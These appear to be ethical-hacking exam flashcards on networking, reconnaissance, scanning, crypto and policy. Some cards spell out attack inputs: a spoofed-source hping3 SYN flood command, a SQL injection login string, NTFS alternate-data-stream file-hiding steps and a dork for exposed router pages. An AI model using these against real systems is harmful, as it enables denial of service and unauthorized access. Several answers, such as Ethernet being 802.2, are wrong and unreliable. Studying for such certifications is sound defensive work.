You need to isolate the communication for desktop computers in the Research department within the company's network. The solution must improve overall performance and security. Which solution should you suggest? A)Deploy a switch, and implement a VLAN for the Research department devices and computers. B)Deploy Bluetooth, and implement a PAN for the Research department devices and computers. C)Deploy 802.11b, and implement a WLAN for the Research department devices and computers. D)Deploy 802.11g, and implement a WLAN for the Research department devices and computers.

Subnet Mask Calculators

Attackers calculate subnet masks using ____ to identify the number of hosts present in the subnet

Backdoors, RootKits, Trojans

Attackers may prevent the system from being owned by other attackers by securing their exclusive access with ____, ____, or ____.

UPnP SSDP M-SEARCH

Attackers may use the ___ information discovery tool to check whether the machine is vulnerable to UPnP exploits or not

network traffic recorded logs received from

Attackers need to harvest IPv6 addresses from ____ : and other header lines in archived email or Usenet news messages

identify vulnerabilities

Footprinting allows an attacker to ___ in the target systems in order to select appropriate exploits

same

For a block cipher algorithm, the length of the input block is the ___ as the length of the output block.

Session

Layer 5 of OSI model

FF:FF:FF:FF:FF:FF

MAC address of broadcast messages

fingerprinting

Port sweeping and enumeration on a machine is also known as ____.

Regional Internet Registry (RIR)

You can find the range of IP addresses and the subnet mask used by the target organization from ______

Nmap, SolarWinds, Netcraft, HTTrack

You can fingerprint operating systems with several tools:

Network Topology Mapper

discovers a network and produces a comprehensive network diagram

Metagoofil

extracts metadata of public documents (pdf, doc, xls, ppt, docx, pptx, xlsx, etc.) belonging to a target company

Control Objects for Information and Related Technology (COBIT)

is "an IT governance framework and supporting toolset that allows managers to bridge the gap between control requirements, technical issues and business risks. It enables clear policy development, good practice, and emphasizes regulatory compliance."

Maltego (www.paterva.com/web5/)

is "an open source intelligence and forensics application" designed explicitly to demonstrate social engineering (and other) weaknesses for your environment.

Exploit Database

is a Common Vulnerabilities and Exposures (CVE) compliant archive of public exploits and corresponding vulnerable software

resource identifier (RID)

is a portion of the overall SID identifying a specific user, computer, or domain.

Online Reputation Management (ORM)

is a process of monitoring a company's reputation on the Internet and taking certain measures to minimize negative search results/reviews and thereby improve its brand reputation.

Maltego

is a program that can be used to determine the relationships and real world links between people, groups of people (social networks), companies, organizations, websites, Internet infrastructure, phrases, documents, and files

Proxy Workbench

is a proxy server that displays data passing through it in real time, allows you to drill into particular TCP/IP connections, view their history, save the data to a file, and view the socket connection diagram

Payment Card Industry Data Security Standard (PCI-DSS)

is a security standard for organizations handling credit cards, ATM cards, and other point-of-sales cards.

Bot

is a software application that can be controlled remotely to execute or automate predefined tasks

Payload

is the part of an exploit code that performs the intended malicious action, such as destroying data, creating backdoors, and hijacking a computer

Document steganography

is the technique of hiding secret messages transferred in the form of documents. It includes the addition of white spaces and tabs at the end of the lines

Nessus

is the vulnerability and configuration assessment product

Eavesdropping

is unauthorized listening of conversations or reading of messages

Ping Sweep

is used to determine the live hosts from a range of IP addresses by sending ICMP ECHO requests to multiple hosts. If a host is live, it will return an ICMP ECHO reply

ID Serve

is used to identify the make, model, and version of any web site's server software; it is also used to identify non-HTTP (non-web) Internet servers such as FTP, SMTP, POP, NEWS, etc.

Network scanning

refers to a set of procedures for identifying hosts, ports, and services in a network

Source routing

refers to sending a packet to the intended destination with partially or completely specified route (without firewall / IDS-configured routers) in order to evade IDS/firewall

Competitive intelligence

refers to the information gathered by a business entity about its competitors' customers, products, and marketing

802.11a

runs at up to 54 Mbps at 5 GHz

PsFile

shows files opened remotely

Bastion host

A computer placed outside a firewall to provide public services to other Internet sites and hardened to resist external attacks.

C. The results will display all HTTP traffic from 192.168.1.1

Examine the Wireshark filter shown here: ip.src == 192.168.1.1 && tcp.srcport == 80 Which of the following correctly describes the capture filter? A. The results will display all traffic from 192.168.1.1 destined for port 80. B. The results will display all HTTP traffic to 192.168.1.1 C. The results will display all HTTP traffic from 192.168.1.1. D. No results will display because of invalid syntax.

Software in use and its behavior Scripting platform used

Examining cookies may provide what kind of information?

"initrd"

Horse Pill is a Linux kernel rootkit that resides inside the ___, from which it infects the system and deceives the system owner with the use of container primitives

Application

Layer 7 of OSI model

TCP payload

In reverse ICMP tunneling, the victim's system is triggered to encapsulate the ___ in an ICMP echo packet, which is forwarded to the proxy server

C) IDS, packet logger, and sniffer

Snort can perform as a ____? A) IDS, sniffer, and proxy B) IDS, firewall, and sniffer C) IDS, packet logger, and sniffer D) IDS, sniffer, and forensic packet analyzer

Network

The TCP/IP model Internet layer is what in the OSI model layer?

B)No known workaround exists

The security team has been analyzing several vulnerabilities found in the Linux kernel they are using. Any upgrades that can be delayed must be pushed to the next fiscal year. Which of the following describes a vulnerability that would require an immediate kernel upgrade? A)A threat vector can be disabled B)No known workaround exists C)Exists in an unused function D)Known workarounds exist

NS (Name Server)

This record defines the name servers within your namespace. These servers are the ones that respond to your clients' requests for name resolution.

SOA (Start of Authority)

This record identifies the primary name server for the zone. The SOA record contains the hostname of the server responsible for all DNS records within the namespace, as well as the basic properties of the domain.

A (Address)

This record maps an IP address to a hostname and is used most often for DNS lookups.

CNAME (Canonical Name)

This record provides for domain name aliases within your zone.

www.geektools.com www.dnsstuff.com www.samspade.com

Well-known websites for DNS or whois footprinting:

Internet Zone Internet DMZ Production Network Zone Intranet Zone Management Network Zone

What are five examples of Network Security Zones?

eMailTrackerPro PoliteMail Email Lookup-Free Email Tracker Yesware Zendio ContactMonkey Pointofmail Read Notify WhoReadMe DidTheyReadit GetNotify Trace Email G-Lock Analytics

What are some Email Tracking Tools?

[cache:] [link:] [related:] [info:] [site:] [allintitle:] [intitle:] [allinurl:] [inurl:]

What are some Google advance search operators?

Know Security Posture Reduce Focus Area Identify Vulnerabilities Draw Network Map

What are the four main goals of footprinting?

Promiscuous Policy Permissive Policy Prudent Policy Paranoid Policy

What are the four types of Security Policies?

1) Helps in monitoring and detecting network behaviors 2) Detects and recovers from security breaches 3) Pays attention to various threats 4) Benefits the organization from a cost perspective 5) Identifies assets 6) Helps to perform risk assessment

What are the six goals of EISA?

Something you know Something you have Something you are

What are the three factors of authentication?

C) An attacker who does not care about the consequences of his actions to himself

What is the best description of a suicide hacker? A) An attacker who performs only DoS attacks B) An attacker who posts all his findings for public review C) An attacker who does not care about the consequences of his actions to himself D) An attacker who does not care about the consequences of his actions to others

C) To sniff or analyze traffic

What is the purpose in configuring a span port on a switch? A) To allow multiple devices to connect to one port B) To protect against MAC spoofing C) To sniff or analyze traffic D) To restrict the port to one device connection only

It evaluates the execution of the security plan. It is also called a lessons learned session.

What is the purpose of a post-mortem in a security audit?

To document what was done and to provide a record for review if problems arise

What is the purpose of recording the steps taken when implementing a new system?

Password recovery tool for Windows

What is the purpose of the Cain and Abel tool?

To crack weak passwords

What is the purpose of the John the Ripper tool?

Vulnerability scanning

What is the purpose of the Nessus tool?

Intrusion detection

What is the purpose of the Snort tool?

To check the integrity of system files

What is the purpose of the Tripwire tool?

D)Demonstrates common server-side security flaws

What is the purpose of the WebGoat application? A)Responds to SYN flood attacks B)Probes your network for security issues C)Acts as a honeypot in the network DMZ D)Demonstrates common server-side security flaws

Port scanning

What is the purpose of the nmap tool?

This Web site is an Internet archiving site that maintains archives of Web sites over many years

What is the purpose of the web site archive.org?

define the scope of the assessment

What is the second step in Pen Testing?

Threat vector

What is the term for the tool or process used to exploit a threat?

Spoofcard (www.spoofcard.com)

What tool can be used to spoof a phone number?

frame

When a recipient system gets a ___, it checks the physical address to see who the message is intended for.

D. Hacktivism

When an attack by a hacker is politically motivated, the hacker is said to be participating in which of the following? A. Black-hat hacking B. Gray-box attacks C. Gray-hat attacks D. Hacktivism

2013090800 = serial number 86400 = refresh interval 900 = retry time 1209600 = expiry time 3600 = defines the TTL for the zone

When looking at a zone transfer you see this line below: hostmaster.anycomp.com (2013090800 86400 900 1209600 3600) What do the numbers mean?

D)ROE

Which documentation provides an ethical hacker with the scope of targets and allowed testing techniques and tools? A)NDA B)PCI C)LPT D)ROE

RSA

Which encryption algorithm is susceptible to a factorization attack?

Port security

Which feature can be enabled on a switch to prevent MAC flooding and MAC spoofing?

snort.config

Which file contains the options for the configuration of the Snort tool?

A. RST

Which flag forces a termination of communications in both directions? A. RST B. FIN C. ACK D. PSH

A. whois

Which footprinting tool or technique can be used to find the names and addresses of employees or technical points of contact? A. whois B. nslookup C. dig D. traceroute

A)MAC flooding D)MAC spoofing

Which of the following attacks can be mitigated by using port security on a switch? (Choose all that apply.) A)MAC flooding B)IP spoofing C)DNS poisoning D)MAC spoofing

C) %windir%\system32\drivers\etc\services

Which of the following contains a listing of port numbers for well-known services defined by IANA? A) %windir%\ext\lists B) %windir%\system32\drivers\etc\lmhosts C) %windir%\system32\drivers\etc\services D) %windir%\system32\drivers\etc\hosts

B)Classes

Which of the following is NOT a component of the Metasploit architecture? A)Interfaces B)Classes C)Libraries D)Modules

A)RC4

Which of the following is NOT a type of block cipher? A)RC4 B)DES C)RC5 D)IDEA

A. CSIRT provides an incident response service to enable a reliable and trusted single point of contact for reporting computer security incidents worldwide.

Which of the following is a primary service of the U.S. Computer Security Incident Response Team (CSIRT)? A. CSIRT provides an incident response service to enable a reliable and trusted single point of contact for reporting computer security incidents worldwide. B. CSIRT provides a computer security surveillance service to supply a government with important intelligence information on individuals traveling abroad. C. CSIRT provides a penetration testing service to support exception reporting on incidents worldwide by individuals and multinational corporations. D. CSIRT provides a vulnerability assessment service to assist law enforcement agencies with profiling an individual's property or company's asset.

C)MAC filtering

Which of the following is an access control mechanism that can be implemented on all wireless networks? A)WEP encryption B)WPA/WPA2 encryption C)MAC filtering D)SSID broadcast

PHP

Which of the following is an example of a server-side scripting language?

A. Incident management

Which of the following is best defined as a set of processes used to identify, analyze, prioritize, and resolve security incidents? A. Incident management B. Vulnerability management C. Change management D. Patch management

Netcat

Which of the following is capable of port redirection? Netstat TCPView Netcat Loki

A) SSL works at the Transport layer, and S-HTTP operates at the Application layer.

Which of the following is true regarding SSL and S-HTTP? A) SSL works at the Transport layer, and S-HTTP operates at the Application layer. B) SSL works at the Network layer, and S-HTTP operates at the Application layer. C) SSL works at the Application layer, and S-HTTP operates at the Network layer. D) SSL works at the Application layer, and S-HTTP operates at the Transport layer.

B. It is a passive OS fingerprinting tool.

Which of the following is true regarding the p0f tool? A. It is an active OS fingerprinting tool. B. It is a passive OS fingerprinting tool. C. It is designed to extract metadata for Microsoft files. D. It is designed for remote access.

D) Running the command sid2user S A 5 21 861567501 1383384898 839522115 500 will return the name of the true administrator account

Which of the following is true regarding this output? A) Running the command sid2user S A 5 21 861567501 1383384898 839522115 502 will return the name of the true administrator account B) Running the command sid2user S A 5 21 861567500 1383384898 839522115 501 will return the name of the true administrator account C) Running the command sid2user S A 5 21 861567501 1383384898 839522115 500 501 will return the name of the true administrator account D) Running the command sid2user S A 5 21 861567501 1383384898 839522115 500 will return the name of the true administrator account

ACL

Which of the following is used to set permissions on content in a website?

B) SYN/ACK

Which of the following represents the second step in the TCP three way handshake? A) SYN B) SYN/ACK C) ACK D) ACK/SYN

A)Execute, implant, retract

Which step involves removing additional user accounts created for the attack phase of a penetration test? A)Execute, implant, retract B)Acquire target C)Escalate privileges D)Penetrate perimeter

IPsec

Which technology can provide protection against session hijacking?

Trapdoor

Which term is used to describe the difficulty of factoring a value generated by large key size?

A)Vulnerability scanner

Which tool can help identify out-of-date software versions, missing patches, or system upgrades? A)Vulnerability scanner B)Network sniffer C)Penetration test D)IDS

Vulnerability scanning

Which type of scanning operates proactively to locate issues, utilizes automated processes, and scans and identifies vulnerabilities of all systems present on the network?

TCPView

Which utility will tell you in real time which ports are listening or in another state?

Remote SPAN (RSPAN)

Which version of the SPAN switch configuration sends traffic from multiple ports on multiple switches to a single switch port where the IDS is located?

whois.com

Which web site can be used to determine the owner of a target web site?

B. Operating system

While performing a pen test, you find success in exploiting a machine. Your attack vector took advantage of a common mistake--the Windows 7 installer script used to load the machine left the administrative account with a default password. Which attack did you successfully execute? A. Application level B. Operating system C. Shrink wrap D. Social engineering E. Misconfiguration

C)Hope to be caught

Why is someone called a suicide hacker? A)Hack for a social cause B)Hack and then offer to correct the vulnerability for money C)Hope to be caught D)Hack with permission

To prevent information leakage

Why should you reduce the amount of information provided in error messages?

Promiscuous mode

Wireshark requires a network card to be able to enter which mode to sniff all network traffic?

B)Time-frame analysis

You are responding to an active hacking attack and need to verify whether an insider suspect is involved. Which type of data analysis should you use? A)Data-hiding analysis B)Time-frame analysis C)Application analysis D)File analysis

C)Child pornography

You have been hired to perform a security assessment of the corporate network. Which discovery requires you to contact external authorities immediately? A)Unlicensed software B)Email exchange between married employees C)Child pornography D)Espionage data acquired from another organization

D)SMB

You have been using a network sniffer to monitor the traffic on your network. You examine the results and notice that some devices are communicating over TCP port 445. Which protocol is most likely causing this traffic? A)SSL B)BGP C)NetBIOS D)SMB

A)Deploy a secure remote access solution for employees to connect to the company's internal network

You have decided to implement IPSec for certain types of traffic. Which of the following is the best description of why you would implement this protocol? A)Deploy a secure remote access solution for employees to connect to the company's internal network B)Ensure that the same IP address is always used by a server C)Authenticate both ends of a connection between a client and server D)Establish an encrypted link between a web server and a browser

B)IP spoofing

You perform a ping and receive the following results: Pinging 192.168.10.1 with 32 bytes of data: Reply from 192.168.10.1: bytes=32 time=5ms TTL=60 Reply from 192.168.10.1: bytes=32 time=1ms TTL=60 Reply from 192.168.10.1: bytes=32 time=1ms TTL=60 Reply from 192.168.10.1: bytes=32 time=1ms TTL=60 During a routine ping test later in the week, you receive a reply packet from the IP address 192.168.10.1, but the TTL value is now 40. What is the most likely reason for this discrepancy? A)DDoS attack B)IP spoofing C)ICMP filtering D)Routing loop

C. Installing WinPcap

You want to begin sniffing, and you have a Windows 7 laptop. You download and install Wireshark but quickly discover your NIC needs to be in "promiscuous mode." What allows you to put your NIC into promiscuous mode? A. Installing lmpcap B. Installing npcap C. Installing WinPcap D. Installing libPcap E. Manipulating the NIC properties through Control Panel | Network and Internet | Change Adapter Settings

B. Gray box

You've been hired as part of a pen test team. During the brief, you learn the client wants the pen test attack to simulate a normal user who finds ways to elevate privileges and create attacks. Which test type does the client want? A. White box B. Gray box C. Black box D. Hybrid

A. Fragmenting

You've decided to begin scanning against a target organization but want to keep your efforts as quiet as possible. Which IDS evasion technique splits the TCP header among multiple packets? A. Fragmenting B. IP spoofing C. Proxy scanning D. Anonymizer

B)Brute-force attack

Your company implemented both symmetric and asymmetric cryptography on its network. As a security professional, you must protect against all types of cryptography attacks. Which attack affects both types of cryptography that are implemented? A)Man-in-the-middle attack B)Brute-force attack C)Session hijacking D)Dictionary attack

routed protocol routing protocol

A ____ is one that is actually being packaged up and moved around (IPv4 and IPv6). A _____ is the one that decides the best way to get to the destination (for example, BGP, OSPF, or RIP).

Proxy server

is an application that can serve as an intermediary for connecting with other computers

client

A computer process that requests a service from another computer and accepts the server's responses.

Data Link layer (Layer 2)

At which layer of the OSI model does an ARP poisoning attack occur?

RST

During a FIN scan, what indicates that a port is closed?

it pulls every record from the DNS server instead of just the one, or one type, you're looking for.

How does a zone transfer using ls -d differ from a normal DNS request?

It extracts (reverse engineers) data points from a graph

How does the tool DataThief operate?

ICMP Ping

Hping Commands: hping3 -1 10.0.0.25

-S

Hping sets the SYN flag

IP spoofing

In what attack does the attacker assume the IP address of a trusted device in an attempt to access protected resources?

Hping Scapy Komodia Ettercap Cain Nmap

What tools can spoof an IP address:

802.2

Which IEEE standard describes Ethernet?

Suicide hacker

Which kind of hacker hopes to be caught?

E. 631

You are examining traffic to see if there are any network-enabled printers on the subnet. Which of the following ports should you be monitoring for? A. 53 B. 88 C. 445 D. 514 E. 631

B)White box

Your organization has contracted with a third-party security firm to access your network by performing a penetration test. The test is designed to simulate a malicious insider who has complete knowledge of the target system. What type of test is this? A)Green box B)White box C)Gray box D)Black box

Direct TTL Probes

1) Send packet to host of suspect spoofed packet that triggers reply and compare TTL with suspect packet; if the TTL in the reply is not the same as the packet being checked, it is a spoofed packet 2) This technique is successful when attacker is in a different subnet from victim

covert channel

A communications channel that is being used for a purpose it was not intended for, usually to transfer information secretly.

Network (Layer 3)

At which layer of the OSI model does an IP spoofing attack occur?

Network (Layer 3)

At which layer of the OSI model does an attack using a rogue DHCP server occur?

Black hats

Considered the bad guys, these are the crackers, illegally using their skills for either personal gain or malicious intent. They seek to steal (copy) or destroy data and to deny access to resources and systems. Do not ask for permission or consent.

"fragment identification" number (IPID)

Every IP packet on the Internet has a ____

B. The zone copy is unchanged.

Examine the following SOA record: @ IN SOA RTDNSRV1.somebiz.com postmaster.somebiz.com. ( 200408097 ; serial number 3600 ; refresh [1h] 600 ; retry [10m] 86400 ; expire [1d] 7200 ) ; min TTL [2h] If a secondary server in the enterprise is unable to check in for a zone update within an hour, what happens to the zone copy on the secondary? A. The zone copy is dumped. B. The zone copy is unchanged. C. The serial number of the zone copy is decremented. D. The serial number of the zone copy is incremented.

gain higher privileges

Exploiting software vulnerabilities allows an attacker to execute a command or binary on a target machine to ___ than the existing ones or to bypass security mechanisms

Audit

Independent review and examination of records and activities to assess the adequacy of system controls, to ensure compliance with established policies and operational procedures, and to recommend necessary changes.

State Sponsored Hackers

Individuals employed by the government to penetrate and gain top-secret information and to damage information systems of other governments

Advanced Persistent Threats

An attack that focuses on stealing information from the victim machine without the user being aware of it

Pseudonymous footprinting

Make someone else take the blame for your information gathering

Attacks

Motive (Goal) + Method + Vulnerability =

Acceptable use policy (AUP)

Policy stating what users of a system can and cannot do with the organization's assets

UID (User ID) GID (Group ID)

Similar to the SID and RID on a Microsoft Windows machine, but on Linux.

1) The client sends a single SYN packet to the server on the appropriate port 2) If the port is open then the server responds with a SYN/ACK packet 3) If the server responds with an RST packet, then the remote port is in the "closed" state 4) The client sends the RST packet to close the initiation before a connection can ever be established

Stealth Scan Process

Operating system (OS) attacks Application-level attacks Shrink-wrap code attacks Misconfiguration attacks

The 4 Attack Types

decryption

The process of transforming cipher text into plain text through the use of a cryptographic algorithm.

A)Evil twin

To attack a wireless network, an attacker sets up a wireless access point that is configured to look exactly like a company's valid wireless access point by using the same SSID. What kind of attack is this? A)Evil twin B)War chalking C)Rogue access point D)WEP attack

Microsoft Outlook www.emailtrackerpro.com www.mailtracking.com

Tools for email footprinting:

Active Passive

What are the two types of banner grabbing?

Risk avoidance

What happens when an organization decides to cease an activity or process that creates a risk?

Scanning

What phase comes after footprinting?

Single-factor authentication

What type of authentication is being performed when both a username and a password are required?

B)RC4

What type of encryption does the Syskey utility utilize? A)RC6 B)RC4 C)RC5 D)RC2

B)Tripwire

Which of the following tools is a System Integrity Verifier? A)Nessus B)Tripwire C)ZoneAlarm D)Snort

Remote Procedure Call (RPC)

allows client and server to communicate in distributed client/server programs

Procedures

are detailed step-by-step instructions for accomplishing a task or goal.

Guidelines

are flexible recommended actions users are to take in the event there is no standard to follow.

Standards

are mandatory rules used to achieve consistency.

Network Tools Pro

assists in troubleshooting, diagnosing, monitoring, and discovering devices on the network

Access control

basically means restricting access to a resource in some selective manner.

Drawing Network Diagrams

gives valuable information about the network and its architecture to an attacker

IP geolocation

helps to identify information such as country, region/state, city, ZIP/postal code, time zone, connection speed, ISP (hosting company), domain name, IDD country code, area code, mobile carrier, elevation, etc.

Finds the Linksys VoIP router configuration page

inurl:/voice/advanced/ intitle:Linksys SPA configuration

Sniffing (also called wiretapping)

is the art of capturing packets as they pass on a wire, or over the airwaves, to review for interesting information.

IPsec

uses ESP (Encapsulating Security Payload), AH (Authentication Header) and IKE (Internet Key Exchange) to secure communication between virtual private network (VPN) end points

Active reconnaissance

uses tools and techniques that may or may not be discovered but put your activities as a hacker at more risk of discovery.

Nondisclosure agreement (NDA)

What type of agreement will ensure the hacker will not disclose any information found during the test?

Passive Banner Grabbing

-Banner grabbing from error messages -Sniffing the network traffic -Banner grabbing from page extensions

C)Three-tier

-Each layer must be able to exist on a physically independent system -Each layer should exchange information only with the layers above and below it -There is a presentation layer, a logic layer, and a data layer Which system architecture has the above characteristics? A)Sandboxing B)Three-legged C)Three-tier D)Defense in depth

SYN ping

-PS

TCP ping

-PT

Serial, normal speed scan

-T2

A. Use HTTP tunneling.

A security administrator is attempting to "lock down" her network and blocks access from internal to external on all external firewall ports except for TCP 80 and TCP 443. (FTP, as well as some nonstandard port numbers). Which of the following is the most likely choice the user could attempt to communicate with the remote systems over the protocol of her choice? A. Use HTTP tunneling. B. Send all traffic over UDP instead of TCP. C. Crack the firewall and open the ports required for communication. D. MAC flood the switch connected to the firewall.

Protection profile (PP)

A set of security requirements specifically for the type of product being tested

crypter

A software tool that uses a combination of encryption and code manipulation to render malware undetectable to AV and other security-monitoring products.

check the filtering system

ACK flag probe scanning can also be used to ___ of target

records all keystrokes typed, IM chats, websites visited

Amac Keylogger for Mac invisibly ___, and takes screenshots and also sends all reports to the attacker by email, or upload everything to attacker's website

D. Archive.org

Amanda works as senior security analyst and overhears a colleague discussing confidential corporate information being posted on an external website. When questioned on it, he claims about a month ago he tried random URLs on the company's website and found confidential information. Amanda visits the same URLs but finds nothing. Where can Amanda go to see past versions and pages of a website? A. Search.com B. Google cache C. Pasthash.com D. Archive.org

Anonymizers

An _____ removes all the identifying information from the user's computer while the user surfs the Internet

B. The web application returned the first record it found

An administrator enters admin' or '1'='1 in the email field of a web page. A message appears stating "Your login information has been mailed to [email protected]" What has most likely occurred? A. The web application picked a record at random B. The web application returned the first record it found C. A server error has caused the application to malfunction D. The web application emailed the administrator about the error

C)14-character passwords will take only slightly longer to crack than the 8-character passwords

Due to the need to support legacy systems, you have been forced to rely on LAN Manager password security. To ensure that users' passwords are strong enough, you plan to use John the Ripper to crack the passwords after obtaining the SAM files from the domain controllers. One of the domains requires 14 characters in the password, while another domain requires only 8. Which of the following statements is true? A)14-character passwords will take much longer to crack than the 8-character passwords B)14-character and 8-character passwords will take exactly the same amount of time to crack C)14-character passwords will take only slightly longer to crack than the 8-character passwords D)8-character passwords will take longer to crack than the 14-character passwords

1) Restrict the interactive logon privileges 2) Use encryption technique to protect sensitive data 3) Run users and applications on the least privileges 4) Reduce the amount of code that runs with particular privilege 5) Implement multi-factor authentication and authorization 6) Perform debugging using bounds checkers and stress tests 7) Run services as unprivileged accounts 8) Test operating system and application coding errors and bugs thoroughly 9) Implement a privilege separation methodology to limit the scope of programming errors and bugs 10) Patch and update the kernel regularly 11) Change User Account Control settings to "Always Notify" 12) Restrict users from writing files to the search paths for applications 13) Continuously monitor file system permissions using auditing tools 14) Reduce the privileges of users and groups so that only legitimate administrators can make service changes 15) Use whitelisting tools to identify and block malicious software 16) Use fully qualified paths in all the Windows applications 17) Ensure that all executables are placed in write-protected directories 18) In Mac operating systems, make plist files read-only 19) Block unwanted system utilities or software that may be used to schedule tasks 20) Patch and update the web servers regularly

How to defend against privilege escalation

SYN scan on port 50-60

Hping Commands: hping3 -8 50-60 -S 10.0.0.25 -V

Intercept all traffic containing HTTP signature

Hping Commands: hping3 -9 HTTP -I eth0

ACK scan on port 80

Hping Commands: hping3 -A 10.0.0.25 -p 80

FIN, PUSH and URG scan on port 80

Hping Commands: hping3 -F -P -U 10.0.0.25 -p 80

SYN flooding a victim

Hping Commands: hping3 -S 192.168.1.1 -a 192.168.1.254 -p 22 --flood

Firewalls and Time Stamps

Hping Commands: hping3 -S 72.14.207.99 -p 80 --tcp-timestamp

Collecting Initial Sequence Number

Hping Commands: hping3 192.168.1.103 -Q -p 139 -s

-1

Hping sets ICMP mode

higher level permissions

If the process executing this binary has ___, then the malicious binary also executes under higher-level permissions

nbtstat -n

If you want to bring up name table on your machine using NetBIOS.

CareerBuilder.com Monster.com Dice.com

If you want to find information about a company's technical infrastructure you can look where?

nbtstat -c

If you want to show the cache using NetBIOS.

Least Significant Bit Insertion Masking and Filtering Algorithms and Transformation

Image File Steganography Techniques

OpenStego QuickStego CryptaPix Hide In Picture gifshuffle PHP-Class Stream Steganography

Image Steganography Tools

loading an external dylib (dynamic library)

In OS X, when an application is ___, the loader searches for the dylib in multiple directories

bit flipping

In ____, the attacker isn't interested in learning the entirety of the plain-text message. Instead, bits are manipulated in the cipher text itself to generate a predictable outcome in the plain text once it is decrypted.

Administrative safeguards

In a risk assessment, data classification and background checks are examples of which type of safeguard?

information is hidden in image

In image steganography, the ___ files of different formats such as .PNG, .JPG, .BMP, etc.

Internet DMZ

In networking, it's a controlled buffer network between you and the uncontrolled chaos of the Internet.

black-box testing

In penetration testing, a method of testing the security of a system or subnet without any previous knowledge of the device or network. It is designed to simulate an attack by an outside intruder (usually from the Internet).

Evil Twin

In what type of attack does an attacker set up a wireless access point that is configured to look exactly like a company's valid wireless access point by using the same SSID?

Hiding files

In which CEH hacking stage do you use steganography?

send a "SYN" (session establishment)

One way to determine whether a port is open is to ___ packet to the port

E. SOA (Start of Authority)

One way to mitigate against DNS poisoning is to restrict or limit the amount of time records can stay in cache before they're updated. Which DNS record type allows you to set this restriction? A. NS B. PTR C. MX D. CNAME E. SOA

Stealth (also called half-open scan or SYN scan)

Only SYN packets are sent to ports (no completion of the three-way handshake ever takes place).

C. They are mitigating the risk

Organization leadership is concerned about social engineering and hires a company to provide training for all employees. How is the organization handling the risk associated with social engineering? A. They are accepting the risk. B. They are avoiding the risk. C. They are mitigating the risk. D. They are transferring the risk.

bypass firewall

Organizations have security mechanisms that only check incoming ICMP packets but not outgoing ICMP packets, therefore attackers can easily ___.

Conduct

Other than Preparation and Conclusion, what is the third phase of the Software Assurance Maturity Model?

Internet

Outside the boundary and uncontrolled. You don't apply security policies to this zone.

This flag forces the immediate delivery of buffered data to the receiving application.

PSH (Push)

gathering competitive intelligence, using search engines, perusing social media sites, dumpster diving, gaining network ranges, raiding DNS information

Passive footprinting methods

SmartWhois Domain Dossier

Perform WHOIS footprinting using tools such as ___, etc. to create a detailed map of the organizational network, to gather personal information that assists in performing social engineering, and to gather other internal network details

eMailTrackerPro PoliteMail Email Lookup-Free Email Tracker

Perform email footprinting using tools such as ___, etc. to gather information about the physical location of an individual in order to perform social engineering, which in turn may help in mapping the target organization's network

Path Analyzer Pro VisualRoute Network Pinger

Perform network footprinting using tools such as ___, etc. to create a map of the target's network

HTTrack Web Site Copier, BlackWidow, Webripper

Perform website footprinting using tools such as ___, etc. to build a detailed map of the website's structure and architecture

Angry IP Scanner, SolarWinds Engineer Toolset's Ping Sweep, Colasoft Ping Tool, Advanced IP Scanner, Visual Ping Tester - Standard, Ping Sweep, Ping Scanner Pro, Network Ping, OpUtils, Ping Monitor, PingInfoView, Pinkie

Ping Sweep Tools

locating active devices firewall

Ping scan is useful for ____ or determining if ICMP is passing through a ___

A or AAAA

Points to a host's IP address

MX

Points to domain's mail server

TFTP (UDP)

Port number 69

secretly monitors and records all activities

Power Spy ___ on your computer

Proxy Switcher, Proxy Workbench, TOR, CyberGhost, SocksChain, Fiddler, Burp Suite Proxy, Proxifier, Protoport Proxy Chain, Proxy Tool Windows App, ProxyCap, Charles, CCProxy

Proxy Tools

Doxing

Publishing personally identifiable information about an individual collected from publicly available databases and social media

A)Smurf attack

Recently, your company's security practitioner suggested that you disable all routers from accepting broadcast ping messages. Which type of attack will this protect against? A)Smurf attack B)TCP RST attack C)MITM attack D)OSPF attack

modify the registry, change local admin passwords, disable local accounts

RemoteExec allows attackers to ___, and copy/update/delete files and folders

"all hosts" link local multicast address

Scanning an IPv6 network, however, offers a large number of hosts in a subnet if an attacker can compromise one host in the subnet; the attacker then probes the ___

Nmap

Scanning Tool

dialers port scanners network mappers ping tools vulnerability scanners

Scanning can use what type of tools

IPv6

Scanning in __ networks is more difficult and complex than in IPv4, and some scanning tools do not support ping sweeps on __ networks

Nmap, Angry IP Scanner, SolarWinds Engineer Toolset, Network Ping, OPUtils, SuperScan, Advanced IP Scanner, Pinkie

Scanning tools (ping sweep, etc):

Qualys FreeScan

Scans computers and apps on the Internet or in your network; tests websites and apps for OWASP Top Risks and malware

PsLoggedOn

See who's logged on locally and via resource sharing

bluejacking

Sending unsolicited messages over Bluetooth to Bluetooth-enabled devices such as mobile phones, PDAs, and laptop computers.

Viruses

Social engineering can use all the following except ____: Mobile phones, Instant messaging, Trojan horses, Viruses

Eavesdropping, Shoulder surfing, Dumpster diving, Impersonation on social networking sites

Social engineering techniques:

Adware

Software that has advertisements embedded within it. It generally displays ads in the form of pop-ups.

Guardster Ultrasurf Psiphon Tails

Some anonymizers:

Company websites and employment ads; Search engines, Internet, and online DBs; Press releases and annual reports; Trade journals, conferences, and newspapers; Patents and trademarks; Social engineering employees; Product catalogues and retail outlets; Analyst and regulatory reports; Customer and vendor interviews; Agents, distributors, and suppliers

Sources of competitive intelligence

communicate secretly

Spam emails help to ___ by embedding the secret messages in some way and hiding the embedded data in the spam emails

B) UDP 514

Standardized in 2001 by IETF, Syslog is a protocol for sending event messages and alerts across a network, specifically an IP network. As an ethical hacker, these log files may be of great use. Which transport protocol and port number should you be looking for in a packet capture to view syslog data? A) TCP 110 B) UDP 514 C) UDP 110 D) TCP 161 E) TCP 514

-Open the command prompt with elevated privileges
-Type the command "type C:\SecretFile.txt > C:\LegitFile.txt:SecretFile.txt" (Here, the files are kept on the C drive; SecretFile.txt is hidden inside LegitFile.txt as an alternate data stream)
-To view the hidden file, type "more < C:\LegitFile.txt:SecretFile.txt" (For this you need to know the hidden stream name)

Steps to hide file using NTFS

cipher text

Text or data in its encrypted form; the result of plain text being input into a cryptographic algorithm.

sh-compatible shell

Bash is an ___ which stores command history in a file called .bash_history

IDS/Firewall

The IP address decoy technique makes it difficult for the ____ to determine which IP address was actually scanning the network and which IP addresses were decoys

D. DNS poisoning

The IT staff is notified that the company's website has been defaced. A security employee, working from home, visits the site and sees the message "YOU HAVE BEEN HACKED" on the front page. He then reboots the system, VPNs to the internal network, and visits the site again, this time noticing nothing out of place. What is the most likely explanation? A. ARP poisoning B. MAC poisoning C. SQL injection D. DNS poisoning

A)Microsoft Windows

